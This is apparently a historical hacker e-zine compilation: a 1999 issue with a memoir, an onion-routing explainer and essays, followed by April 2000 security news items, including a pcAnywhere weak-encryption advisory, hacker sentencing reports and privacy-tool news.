/ /\ / (_| |_) (_| | | | | | | |
/_/ \/ \__, .__/\__,_|_|_| |_| |_|
|_|
Issue 1 (Sep. 29, 1999)
___________________________________________________________________________
The gh0st.net project: http://www.gh0st.net/index.html
URL of the day: (Computer geek cartoons) http://www.userfriendly.org
All content copyright � 1999 by the individual authors, All Rights Reserved
___________________________________________________________________________
- Editor's Comments
- URLs
- News
- My Life As A Happy Hacker
- Onion Routing
- The gh0st.net Project
- Violence, Censorship, & Our Rights
- Future Issues
- Credits
***********************************************************************
*** Editor's Comments : Kynik
***********************************************************************
For now, I'm just going to borrow the layout I used while I was HH editor.
(Which I am no more.) I'll try to make it a little bit more freeform than
this first issue, but we'll have to see. I'd like to see this zine
diverge a little from the standard 'security info' theme and get into
music, news and whatever tickles everyone's fancy. Email me at
kynik@gh0st.net for damn near anything. Oh, and send me good links, too.
NOTE: Due to the gh0st.net webserver and mailserver's owner moving very
far away soon, the website may be inaccessible for quite some time. You
can contact us at napalmzine@hotmail.com until we get everything back up
again. Thanks to TF for actually hosting all the web pages and mail
server!
***********************************************************************
*** Random good URLs : Kynik
***********************************************************************
The Roskilde music festival in Copenhagen, Denmark
http://www.roskilde-festival.dk/
The OSKit - build your own OS
http://www.cs.utah.edu/flux/oskit/
gh0stOS
http://www.gh0st.net/gh0stOS/
Good source code for neural networks
http://www.geocities.com/CapeCanaveral/1624/
Irish pop-punk
http://www.iol.ie/~brooder
***********************************************************************
*** My Life As A Happy Hacker : Kynik
***********************************************************************
A long time ago (probably 3-4 years) on a computer lab workstation far,
far away (ok, it was the Midwest) I discovered the Happy Hacker in my
quest for knowledge of the computer sort. I found it after sifting
through search engine results of the keyword 'hacker'. I had been
inspired by such movies as "Wargames" and "Sneakers" and realized that
there was a lot more to this computer thing than Doom and Microsoft Word.
Having realized this, I dove headfirst into the web, trying to find a
place that suited my wants and actually had an air of intelligence.
Many of the sites I found were crude and obviously created by
middle-school-aged kids looking to mess with their friends on AOL. Two
things I found caught my attention immediately: Silicon Toad and The Happy
Hacker mailing list. I proceeded to download a whole pile of programs
from Silicon Toad's site, and played with them on my computer at home, but
beyond that, didn't do too much. I checked in on it every once in awhile,
until the site disappeared. I kept on getting the happy hacker
newsletter, and found out how to do some neat, trivial things such as
changing my Windows 95 splash screen for startup and shutdown.
Then I began to read about some of the things that people had done with
their computers, and against the list founder, Carolyn Meinel. I didn't
think too much about this at the time, but kept my interested fascination
with the whole 'hacker culture' as I progressed with my Computer Science
degree. I continued to receive the digest, and towards the end of 1998, I
got a Happy Hacker digest with a request for a new UNIX editor. Having
read most of the info out there about Carolyn Meinel and the general
consensus about her, I thought about it carefully before I sent in an
application. I realized the stigma that currently goes along with CPM and
the Happy Hacker name, but after consideration, I thought I'd try to keep
alive the idea that got me into the Happy Hacker in the first place:
Knowledge and Ethics. Granted, CPM is currently more interested in money
and promoting herself than educating and instilling ethics, from what I've
seen.
I emailed her, and asked if the position was still available. She asked
me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I
chose. I chose to write a beginner's guide to C++, since there already
was one for C. Well, I sent her a small piece of what I had written, and
she advised me that Guide submissions are generally much longer. So I set
off to flesh it out and expand on the parts she said were somewhat
lacking. I got about 2/3 of the way through it, and grad school and work
took precedence. A few weeks later, totally to my surprise, I got an
email from Carolyn asking me if I wanted the position. I said yes, we
exchanged our PGP keys, I got the passwords to the unixeditor POP account,
and I started reading submissions and putting them together to form the
Happy Hacker UNIX digest. To see the digests, as they were submitted to
Carolyn, go to the following URL:
http://fire.gh0st.net/hh/index.html
The first few digests were pretty weak, as most of the questions I got
were rather bland, and I was still getting the feel of the position. I
got very few flames, and a lot of praise. I realized that I might
actually be making a difference to some people, trying to help them
understand the basics (and some details) of UNIX and computer security.
When I heard that Carolyn had moved the HH mailserver over to an
AntiOnline computer, I wasn't thrilled, but I really didn't care all that
much at the moment. Keydet89, the windows editor, apparently left because
of this, which was rather sad, because he always had good perl snippets in
his digests. (Send me an email keydet, if you wanna tell about your
experience, or write some articles :)
Then I thought about it. I looked back at AntiOnline's features section,
and I thought about JP's article on "Hacker Profiling". Pieces started to
fit together. I thought about the possibility that JP was making copies
of any mails that I received as a submission and adding them to his pile
of material to be filtered and info to be added to the 'hacker database'.
See, a lot of times I'll be sent an email claiming to have broken into a
site and wanting to know what to do from there. (Or, someone requests me
to break into a site for them -- which I'd consider doing, provided you're
paying me and the site is yours.) In the second-last HH digest, I
included a link to my PGP key, and an alternate email address that people
could write to. I'd say about half of the respondents used the other
email address... and 2 or 3 used the PGP key. I realized that I needed a
bit more creative freedom, without eyes peeking over my shoulders.
So, I teamed up with some people I had met online, and had been working
with for a little while, and offered to create a new zine, with an
emphasis on computers, security, and music. I wanted to give the people
that needed a certain amount of mentoring a chance to get some people to
talk to if they needed help. I found out that there was a similar group
of people working on a project similar to the Happy Hacker wargames, but
cooler, and I started hanging out with them as well. So, here ends my
Happy Hacker story. I know I've left out some minor details, but don't
worry, they weren't that important. Let's have a big round of applause
for the gh0st.net and FireStorm guys! Hopefully the projects will pick up
soon, and there will be more to see on both the fire.gh0st.net and
www.gh0st.net sites.
-Kynikeren
***********************************************************************
*** Onion Routing : Kynik
***********************************************************************
While it seems that the term "Onion Routing" may be copyrighted, I feel
that it is a good description of the technology. Onion Routing is an
Internet-based system to prevent eavesdropping and traffic analysis. The
name "Onion Routing" is appropriate, since it is based upon adding several
layers of encryption to a message (and removing them) as it is passed
along the network, as one might remove the layers of an onion. (I suppose
one could also call it 'artichoke routing' too ;) This is essential to a
network where privacy and anonymity is important.
"Well, so what about privacy, everything I'm sending to that site is
encrypted with SSL, anyways", you may say. That's all fine and dandy, but
chances are, anybody monitoring you knows at least that you've been there,
since the destination address is plainly readable in the IP header.
That's where the anonymity portion comes in. Someone between you and the
website you're visiting is _not_ able to tell (easily) where you're going,
or even where you're coming from. There are two notable systems in
use/development today (at least what I've initially found). They are:
Freedom - "Internet Identity Management System"
http://www.zeroknowledge.com/products/
The Onion Router Project (US Naval Research Lab)
http://www.onion-router.net/
There are some differences between the two, but I'm not going to analyze
them. Now, how does this all work, you ask? The scheme is built upon
public-key encryption (of varying strengths) and a 'private' network of
routers. Basically, your packet doesn't take the direct route across the
net like you'd expect it to. Instead, it is sent to a specialized
computer which runs the 'onion routing software'. That 'onion router'
(OR) hands the packet off to the next designated OR, which continues to
forward it on, until the last OR designated finally delivers it to the
true destination. I don't want to get into the mechanics for establishing
routes and vendor-specific details like Freedom's Anonymous Mail Proxy,
but instead I will explain the generic mechanism that allows you to send
anonymous, private traffic across the internet via onion routing.
A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion
Routing for Anonymous and Private Internet Connections," does a thorough
job of explaining this technology:
http://www.onion-router.net/Publications/CACM-1999.pdf
From the paper:
Onion Routing operates by dynamically building anonymous connections
within a network of real-time Chaum Mixes. A Mix is a store and forward
device that accepts a number of fixed-length messages from numerous
sources, performs cryptographic transformations on the messages, and
then forwards the messages to the next destination in a random order.
A single Mix makes tracking of a particular message either by specific
bit-pattern, size, or ordering with respect to other messages difficult.
By routing through numerous Mixes in the network, determining who is
talking to whom becomes even more difficult. Onion Routing's network of
core onion-routers (Mixes) is distributed, fault-tolerant, and under
the control of multiple administrative domains, so no single onion-
router can bring down the network or compromise a user's privacy, and
cooperation between compromised onion-routers is thereby confounded.
Freedom's system might be slightly different in implementation, but again,
I'm ignoring details, and loving every minute of it! When a specific
message needs to be sent through the onion-routed network, several layers
of encryption are placed on the message, along with sufficient information
to describe the path on a step-by-step basis. This way, each onion router
along the way uses its own public key to decrypt the whole 'onion', at
which point it recognizes the next onion router in the route, and forwards
the partially-decrypted message to it. When the enveloped message
eventually reaches the final onion router, it is decrypted to cleartext,
and the message is passed to the destination, not too differently from if
the source host had simply connected in the clear over the Internet,
except for the fact that it was made virtually untraceable for the
duration of its trip from end to end.
Feel free to send me questions and commentary on anything I may have
screwed up (or done well).
kynik@gh0st.net
***********************************************************************
*** The gh0st.net Project (Part 1 of 2): Phatal
***********************************************************************
Gh0stnet in its simplest and most basic form is a security model. As a
security model, gh0stnet's integrity is maintained by the fact that it
protects access, whether this be access to data or some other resource
makes no difference. Complication occurs when we examine gh0stnet's
purpose.
The theme is not necessarily to provide an ultra-secure network... it's
simply to provide security. Whether the provision of security is done
well or even in a rational manner is up to us as developers. Further
complicating this matter is the concept of providing a security challenge
or novelty to the public. Are we targeting a specific group of people to
benefit from gh0stnet? As far as I'm concerned, no. While we are all
obviously aware that gh0stnet's existence specifically caters to a certain
type of computer user, there's been no real intention to do so. By virtue
of not being funded by a corporation or the government and also by the
virtue of being conceptualized by someone who spends the better part of
his day immersed in computer security, the compsec underground will
inevitably be an integral part of gh0stnet. Hopefully this will be one of
its greatest assets.
Although the physical establishment of gh0stnet is still in the works, I
have a feeling that's going to be the easy part. I'm putting energy into
gh0stnet with the intention that it will long surpass my interest. As a
field of study and a science, computer security is an evolving subject.
If gh0stnet is to ever provide anything substantial to its public, it will
have to reflect this.
Development:
This is the area that gh0stnet should be the most active in. If there's
one thing I hate it's purposeless work. What I hate more than purposeless
work is being bored. From my perspective, I would prefer to do more than
set up a number of boxes to let people hammer into the ground. It would
be fun to look at the logs for a while, but ultimately it would become
boring.
I'm interested in using gh0stnet as a testbed for alternative,
ingenuitive, and challenging security concepts. This would provide tons
of fun for us, something interesting to give to the users besides boxen to
break into, and more than likely create some very interesting offspring.
Software or hardware, it's all a matter of what contributions we as
individual developers have to offer.
Participation:
This is an area that I tend to give a lot of thought to. As "developers"
we really do more than just develop. We maintain and administer gh0stnet.
This is not a job. Participation is totally interest-based. I'm not one
to force people into doing something that they don't want to. If it
appears that the role you're taking in this project is not quite what you
want or what you expect, it's important that you speak up. I sacrifice a
lot of my free time for this but I don't neccessarily expect others to.
The project does have a well-defined vision/goal that I may be relatively
inflexible about, but not unapproachable. What I will be very wary of is
the inclusion of other individuals outside of my sphere of influence.
This is a delicate project from my standpoint, so I'm a little touchy as
to who deals with it. To have one person on board who doesn't quite see
the goal or has some other motives besides the prosperity of gh0stnet
would have a negative impact on the project. Stating this here serves no
other purpose than for you folks to be aware that I want a shiny, happy,
rosey environment in which I deal with people who I know and trust. Not
that I don't like contributions, but network management and planning
should pretty much be kept between us developers.
The most important part of getting this off the ground will be the
communication that goes on between all of us. Hopefully most of the
communication will be occurring on the gh0st.net box, courtesy of TF.
Toxy has also been threatening to start a mailing list and that sounds
kick ass to me. Natas, kp2, and I live in the same state and hopefully
we'll all be getting drunk together soon ; ).
<Next issue = Basic network structure && games>
***********************************************************************
*** Violence, Censorship, & Our Rights : Blakboot
***********************************************************************
[Editor's note: I've taken the liberty to publish this article by Fire
Storm's founding member in his absence. This article was (and still is)
available at <http://fire.gh0st.net/vcr.html>. It has not been edited from
its original form, except for formatting to fit the page, and minor
spelling corrections.]
To most of the people whom will read this, I have no credibility - why
should you listen to me? Well, because if you read any farther, I'm sure
you will find that I'm not writing about anything extreme; these are our
rights.
Recently, in retaliation to school violence, people are working to
suppress information pertaining to explosives; keep it out of the hands of
youngsters. Although, this movement is not focusing on just that, rather
make an exception to our rights, and quiet what we don't want people to
hear. You see, this country is based on tolerance. Some may be
prejudiced, but we as a whole, in this country, don't just go off destroy
the minority. We tolerate it, because if one day our rights are
threatened, we can count on other people to fight with us. It's about
power of people, and not everyone can get what they want - so we must be
tolerant, even if we don't totally agree with it.
The movement is contradicting itself. People want to educate the masses
into an objective whole, yet want to shut out information, and take the
philosophy, "Ignorance is bliss". We should work towards happiness,
because anyone can learn to KILL; bombs, guns, knives, etc. are beside
the point. People kill because of many reasons, and "now they can" isn't
it.
The general public is quick to say that bombs, guns, and "outcasts" are
the reason for this school violence problem. Wrong. Students don't kill
just because they _can_, it's because, perhaps they're miserable? Perhaps
they're implementing the violence many students just think about? My
opinion is yes; I've even tempted to say majority by far think about
violence as an outlet.
"Wackos" just don't think about violence; everyone does and sometimes we
actually do what we plan. I'm not trying to justify what these people do,
but I'm saying this isn't just some isolated cases. Something is wrong.
I personally think it's new presures in society today and the school
enviroment. Keep in mind that the basic idea/concept of how school works
has never changed. This "concept" isn't education, it's the enviroment,
which is stressful and obviously causes violence. You may say something
to the effect, "Stress is a natural part of life". I agree with you, but
these are CHILDREN we're talking about, and they obviously can't cope.
Back on the subject of unalienable rights. If we make an exception,
we'll find ourselves taking away our own rights, _one_by_one_. There is
NO exception, these are our RIGHTS! There will always be someone you
disagree with, but you'd better respect THEIR freedom, if you want them to
respect YOUR freedom. Because one day, your thoughts may not fit in with
the majority.
End points:
People in the Untied States of America have the right of press; we can
write about anything and everything. If you dont like it, leave. See how
other goverments deal with these things, and tell me how much you hate
liberalism.
Leave and go to a country where you can't say jack, and tell me how much
you'd like to shut up those boisterous protestants. This issue isn't
something new. Censorship itself is an exception we've made, and it's
wrong.
***********************************************************************
*** Future Issues
***********************************************************************
The gh0st.net Project (Part 2 of 2) : Phatal
Creating Restricted ("Sandboxed") User Accounts : Fict
***********************************************************************
*** Credits
***********************************************************************
Editor: Kynik <kynik@gh0st.net>
Co-editor: Ajax <ajax@gh0st.net>
Article Contributions: Phatal <phatal@gh0st.net>
Blakboot <blakboot@discussion.org>
***********************************************************************
*** Subscription
***********************************************************************
To subscribe to this 'zine:
email kynik@gh0st.net or napalmzine@hotmail.com with a subject of
SUBSCRIBE
To unsubscribe:
email kynik@gh0st.net or napalmzine@hotmail.com with a subject of
UNSUBSCRIBE
Submissions, questions, comments, and constructive chaos may also be
directed to kynik@gh0st.net, napalmzine@hotmail.com or any of
the contributors
***********************************************************************
@HWA
193.0 HNS:Apr 8th:NEW KIND OF SECURITY SCANNER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Saturday 8 April 2000 on 3:33 AM
ISS is offering an on-line scanner for Web sites which surveys users'
hard drives to detect any potentially dangerous programs, such as
Trojans and viruses, that may have been placed on the machine without
their knowledge.
Link: The Register
____________________________________________________
http://www.theregister.co.uk/000407-000033.html
----------
Posted 07/04/2000 8:17pm by Thomas C. Greene in Washington
New Web site security scanner will read your HDD
Internet Security Systems (ISS), is offering an on-line scanner for Web
sites which surveys users� hard drives to detect any potentially dangerous
programs, such as Trojans and viruses, that may have been placed on the
machine without their knowledge.
The ISS Online Scanner will automatically test individual computers,
identify security weaknesses, and provide users with easy-to- follow
instructions for fixing security problems.
It looks at the overall configuration of a computer and recommends changes
that can help prevent unwanted intruders from reading or changing
sensitive personal files or from enabling an attacker to use the computer
as a 'zombie' machine to launch more broad-based Internet attacks.
"The importance of offering scalable security management solutions to
companies that want best-of-breed technology is critical to the success of
protecting the Internet economy," ISS Vice President of Enterprise
Software Keith Cooley said.
"It is imperative that organizations can easily implement the processes
and technologies needed to automatically monitor and respond to security
risks. As the industry�s leading trusted security provider, ISS is
strengthening our unique security software platform to ensure safe and
uninterrupted e-business for our customers worldwide," he crooned.
The ISS application will use Active-X technology to scan a visitor's
machine and wipe out any undesirable code.
The company acknowledges that use of scanning applications by Web sites
could be controversial. But we don't see much of a problem with it. Sites
that offer it as a free, voluntary service will do themselves and their
customers a favour.
Sites foolish enough to require it as a condition of visiting or doing
business will find themselves paying a heavy price in gross revenues, as
the vast majority of Web surfers are sure to be repelled by it. 'Market
forces' should be adequate to keep this a relatively harmless little
gimmick. �
@HWA
194.0 HNS:Apr 8th:WAYS TO ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Saturday 8 April 2000 on 3:32 AM
Following recent high-profile Web security breaches, Enstar, an
e-security firm, hosted a live demonstration in San Antonio Friday to
show the many ways hackers break into systems.
Link: CRN
____________________________________________________
http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID
----------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.
/templates/sql_createarticle.asp, line 24
Cool. thanks.
@HWA
195.0 HNS:Apr 7th:STOLEN ACCOUNTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 6:50 PM
"Malicious hackers" from overseas have been racking up surfing bills
for unsuspecting SingNet customers by using their Internet accounts,
The Straits Times has found out.
Link: The Straits Times
____________________________________________________
http://www.straitstimes.asia1.com/singapore/sin20_0407.html
----------
APR 8, 2000
Overseas hackers using SingNet accounts to surf
They are racking up bills for customers by using the global-roaming
facility. SingNet devises a counter-strategy
By STEVE DAWSON
"MALICIOUS hackers" from overseas have been racking up surfing bills for
unsuspecting SingNet customers by using their Internet accounts, The
Straits Times has found out.
The hackers, many of whom have been traced to Thailand, take advantage of
a facility called global roaming, provided by SingNet.
The facility allows users who travel overseas to call up a service
provider there to connect to SingNet, so they save on IDD charges.
The number of complaints from customers who said their accounts have been
used by other people peaked at around 50 a month in November and December,
said SingNet's product development manager, Mr Lee Wan Fei.
SingNet, which has a 260,000 customer-base, sees the cases as fraud and
have referred them to the police.
Most cases seem to involve students, who use chatrooms or
instant-messaging services regularly.
Here, passwords can either be detected through Trojan-horse viruses
installed on the hard drive through files sent via e-mail or lapses in
personal security, like giving your password to other people.
Overseas surfers who obtain passwords fraudulently are then able to log on
to the Net using an account belonging to a SingNet customer.
This unauthorised use raises the customer's bill. SingNet declined to say
how much money was involved.
Contractually, SingNet's customers are responsible for all usage on their
accounts. But Mr Lee said: "On a case-by-case basis, with adequate proof
provided by the user, we may consider offsetting part of the bill for
them."
SingNet has launched a two-pronged counterattack. It will, from Tuesday,
allow users to disable the global-roaming service, which, at present,
cannot be disabled.
Secondly, when SingNet detects use of the global-roaming service on an
account, the account-holder will be automatically notified.
Mr David Berryman, SingNet's "abuse-master", is working closely with the
Criminal Investigation Department on the cases.
He said surfers can also play their part by keeping their passwords secure
and downloading the free security software available to SingNet
subscribers at www.singnet.com.sg/customer/abusetools/
@HWA
196.0 HNS:Apr 7th:JAILED FOR SIX MONTHS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 6:48 PM
Po Yiu-ming, 19, who was among the first three hackers to be convicted
since computer crime-related laws were enacted in 1994, was jailed for
six months yesterday.
Link: SCMP
____________________________________________________
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp
----------
Thursday, April 6, 2000
Computer hacker jailed for six months ELAINE PAK LI
--------------------------------------------------------------------------
------ A shy teenager who became a computer hacker to find "satisfaction
and achievement" was jailed for six months yesterday. Clerk Po Yiu-ming,
19, who was among the first three hackers to be convicted since computer
crime-related laws were enacted in 1994, turned to crime because he was a
social outcast, a court heard.
Restaurant manager Tam Hei-lun, 19, and student Mak King-ming, 18, were
both sentenced to a detention centre for similar offences.
The trio, who had earlier pleaded guilty to a total of 49 computer
crime-related charges, appeared before Eastern Court magistrate Ian Candy
yesterday.
Po's lawyer, Wong Man-kit, said the clerk suffered asthma and a skin
disease, which had isolated him from classmates.
Gradually he became an introvert with low self-esteem.
"He then became interested in computers and was obsessed . . . He got a
sense of achievement and satisfaction from such offences," Mr Wong said.
Barrister Thomas Chan, for Tam, suggested a community service order so the
restaurant manager could be punished and rehabilitated at the same time.
Tse Hon-yuen for Mak, said the student, who was sitting his A-levels, was
now "aware of the responsibility of his foolish act".
But Mr Candy, who described the three first offenders as "talented and
highly intelligent in computer skills", said they had caused "great damage
and loss to society and the economy".
"Each of you are well aware that the things you do are dishonest and
wrong. Your offences have even alarmed legitimate Internet users.
"The court must give a clear message that these offences must be given a
deterrent sentence.
"Even though each of you have clear criminal records, come from good
families and are in every other way talented, the only sentence to impose
is an immediate custodial term," Mr Candy said.
The court has heard Po had illegally obtained 127 login names and
passwords, given to Internet users when they subscribe to a service
provider for a monthly fee and an hourly rate.
The trio got know each other through the Internet and exchanged the login
names and passwords and hacked into a number of user accounts.
Mak had also downloaded songs from the Internet and sold them on discs
without the publishers' authorisation, the court had heard.
Tam wept as he was sentenced while the other two remained expressionless.
The trio applied for bail pending appeal and were released on $10,000
bail.
Detective Senior Inspector Fung Wai-keung of the Computer Crime Bureau,
who was in charge of the case, described the sentences as "appropriate."
"Illegally obtaining login names and passwords and selling them for profit
is just one of many computer related crimes," he said.
"The precedent set today is a good example to show to the international
community that Hong Kong will never allow such crimes in the information
technology field.
"We are not going to let such crimes affect the local electronic trade and
its reputation," Inspector Fung added.
@HWA
197.0 HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 4:27 PM
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and password are not sent directly in
clear. Since most users have the encryption methods set to either
"none" or "PcAnyWhere", their password are sent with weak encryption.
Link: Bugware
____________________________________________________
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,
----------
PcAnywhere weak password encryption Posted to BugTraq on 7.4.2000
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and password are not sent directly in
clear. Since most users have the encryption methods set to either "none"
or "PcAnyWhere", their password are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can authenticate users
based on their NT domain accounts and passwords. When the user logs on, it
is prompted for its NT username and password. They are then "encrypted"
through the PcAnywhere method and decrypted by the host computer for
validation by the NT domain controller. Someone snooping on the traffic
between the two stations will unlock both the PcAnywhere and NT account.
All that without even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at all. Username
and password are sent in clear. I haven't tested version 8 yet.
--- Solution --- Symantec says that this was not intended to be real
encryption and suggest the use of the Public or Symetric key option
instead. More info can be found at :
http://service1.symantec.com/SUPPORT/pca.nsf/docid/ 1999022312571812&src=w
@HWA
198.0 HNS:Apr 7th:NET PRIVACY TOOLS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 3:46 PM
Microsoft promised free Internet tools based on emerging privacy
standards for controlling how much information people using the Web
reveal.
Link: CNET
____________________________________________________
http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head
----------
Microsoft plans free Net privacy tools By The Associated Press Special to
CNET News.com April 7, 2000, 4:50 a.m. PT TORONTO--Microsoft promised free
Internet tools based on emerging privacy standards for controlling how
much information people using the Web reveal.
Coming from the world's largest software company, the tools could give
impetus for Web sites and other companies to embrace the Platform for
Privacy Practices, or P3P. The World Wide Web Consortium, an Internet
standards group, may finalize P3P this summer.
Richard Purcell, Microsoft's chief privacy officer, said the tools will
help consumers better understand how sites track visits and pass along
information to other parties.
A formal announcement is expected in a few weeks. Purcell disclosed the
company's intent during an interview yesterday at the Computers, Freedom
and Privacy conference here, meeting through today.
People using the Internet are increasingly concerned about Web sites that
create profiles of email addresses, favorite books and clothing sizes for
marketing purposes.
Sites often disclose their intent in privacy statements that are difficult
to find and understand. The Microsoft tools, to be released this fall,
will translate such statements into machine-readable form and let Internet
surfers block access to sites that collect too much.
With the software, people using the Web can state what types of
information they are willing to give, as well as whether they mind sharing
that information with outside parties. Internet surfers will receive a
warning before visiting sites that go beyond that level.
Microsoft plans to make the tools for its browser, Internet Explorer, and
for the competing Netscape browsers.
Lorrie Cranor, who heads a P3P
Lorrie Cranor, chair of the P3P specification working group at the W3C,
discusses the proposed privacy standard.
working group, considered Microsoft's decision important, saying, "In
order for P3P to be widely used, there has to be good user software
available.
"The question I always get is, 'Is Microsoft going to implement it?'" she
said.
Still, critics believe Web sites won't have incentives to join, rendering
such tools and standards meaningless. Jason Catlett, president of
Junkbusters and a critic of P3P, said wide adoption remains years away.
@HWA
199.0 HNS:Apr 7th:SECURITY ADDITIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 3:45 PM
Cisco Systems next week plans to ramp up its VPN security with a new
addition to its PIX firewall line as well as an updated version of its
Secure Policy Manager software for enterprise users.
Link: InfoWorld
____________________________________________________
http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml
----------
Cisco plans firewall addition for small businesses
By Cathleen Moore
CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network)
security with a new addition to its PIX firewall line as well as an
updated version of its Secure Policy Manager software for enterprise
users.
The Cisco PIX Firewall 506 will bring a low-end offering aimed at small
businesses and branch offices to the company's existing firewall set.
Other products in the family include the PIX 515, targeted at small and
midsize enterprises, and the Secure PIX 520, which is designed for large
enterprise installations.
With its newest firewall member, Cisco is attempting to tap into small
business environments, which -- with increasing reliance on the Internet
-- are seeking more powerful security solutions for remote access
technologies and VPN. About the size of a hardback, the PIX 506 can handle
throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to
Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB
of RAM, and two integrated Fast Ethernet ports.
Version 2.0 of Cisco Secure Policy Manager adds improved scalability and
additional support for IPsec VPN configurations in Cisco's routers and
firewalls. The Policy Manager lets IT managers define and audit network
security policies from a central location, according to the company. The
product also can simplify deployment of security services supported by
Cisco's firewalls and IOS-based VPN routers, Cisco said.
The Cisco Secure PIX Firewall 506 will be available in May, priced
starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this
month, priced at $7,500.
Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com.
Cathleen Moore is an InfoWorld reporter.
@HWA
200.0 HNS:Apr 7th:COOKIES
~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 3:43 PM
You say you don't like browser cookies? You're not quite sure if that
program you download from the Net is revealing more about you than it
should? Wired has an article about it and we had a discussion on them
on our forum.
Link: Wired on cookies
Link: HNS forum
____________________________________________________
http://www.wired.com/news/politics/0,1283,35498,00.html
http://default.net-security.org/phorum/read.php3?num
----------
Getting Snooped On? Too Bad by Declan McCullagh 3:00 a.m. Apr. 7,
2000 PDT TORONTO -- You say you don't like browser cookies? You're
not quite sure if that program you download from the Net is
revealing more about you than it should?
Well, here's something to make you really nervous: In the United States,
it may be illegal to disable software that snoops on you.
The folks who came up with this idea turn out to be the large corporations
that helped to draft the Digital Millennium Copyright Act (DMCA), which
restricts some forms of tampering with copyright protection devices.
In some cases, that means you won't be able to turn off any surveillance
features it might include, according to participants in a Thursday
afternoon panel at the Computers, Freedom and Privacy conference.
"Privacy circumvention is possible only under a limited circumstance,"
said Paul Schwartz of the Brooklyn Law School.
As more and more copyrighted material makes its way online, content owners
are turning to encryption to protect their works from widespread illicit
redistribution.
Stephen King distributed his recent novel online in encrypted form, and
music companies are backing Secure Digital Memory Card for audio players.
Privacy advocates fret that if future works are secure and thus protected
under the DMCA, they could reveal consumers' private behavior
--RealNetworks' RealJukebox player secretly did just that -- and tinkering
with the program to turn off the reporting mechanism would be illegal.
"The practical impact is it's another area we're going to be fighting
about," Schwartz said.
The DMCA, which became law in October 1998, does allow some very limited
forms of privacy circumvention. You're allowed to do it if the software
leaks "personally identifying information" about you without giving you
the ability to say no, and if you're not "in violation of any other law."
But here's the rub: Many, if not most, programs include shrink-wrap
licenses that prohibit reverse-engineering or altering the program.
Some courts have said that shrink-wrap licenses -- software license
agreements that don't require a signature -- are binding. If you violate
them, would you be able to take advantage of the DMCA's
privacy-circumvention loophole?
The answer may well be yes. "The statute is basically totally incoherent,"
says Pam Samuelson, a professor at the University of California at
Berkeley and an influential copyright scholar.
"We're getting tortured by laws that are inherently incoherent,"
complained Barry Steinhardt, associate director of the ACLU.
Violating the DMCA is a civil offense, and "willfully" violating it for
private financial gain is a criminal offense punishable by five years in
jail and a $500,000 fine.
(Cookies are a dead non-issue, get over it - Ed)
@HWA
201.0 HNS:Apr 7th:SECURE E-MAIL SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 3:39 PM
The Royal Mail has launched a secure e-mail service through its secure
technology service, ViaCode.
Link: Silicon.com
____________________________________________________
http://www.silicon.com/public/door?REQUNIQ
----------
@HWA
202.0 HNS:Apr 7th:ONLINE MUGGERS
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Friday 7 April 2000 on 3:38 PM
"You are running a Web site. Making money perhaps, and visitors are
seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?" Read Winn Schwartau's
article.
Link: IDG.net
____________________________________________________
http://www.idg.net/servlet/ContentServlet?global_doc_id
----------
We're sorry but we are currently unable to process your request.
Please try again later. If you continue to get this message,
please go to Feedback and let us know. We apologize for the
inconvenience.
(Guess they were mugged ... -Ed)
@HWA
203.0 HNS:Apr 6th:SURVEY BY DTI
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Thursday 6 April 2000 on 3:00 PM
British companies are too complacent when it comes to Internet
security and only have themselves to blame if their IT systems are
compromised by hackers. That is one of the conclusions published by
Department of Trade and Industry. Contributed by Lady Sharrow.
Link: The Register
____________________________________________________
http://www.theregister.co.uk/000406-000023.html
----------
Printed elsewhere
@HWA
204.0 HNS:Apr 6th:COMPUTER CODES PROTECTED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Thursday 6 April 2000 on 1:58 PM
Computer programs used to scramble electronic messages are protected
by the First Amendment because those codes are a means of
communication among programmers, a federal appeals court ruled
Tuesday.
Link: Associated Press
____________________________________________________
http://www.worldnews.com/?action
----------
bad url
Internal Server Error
The server encountered an internal error or misconfiguration and
was unable to complete your request.
Please contact the server administrator, will@sowerbutts.com and
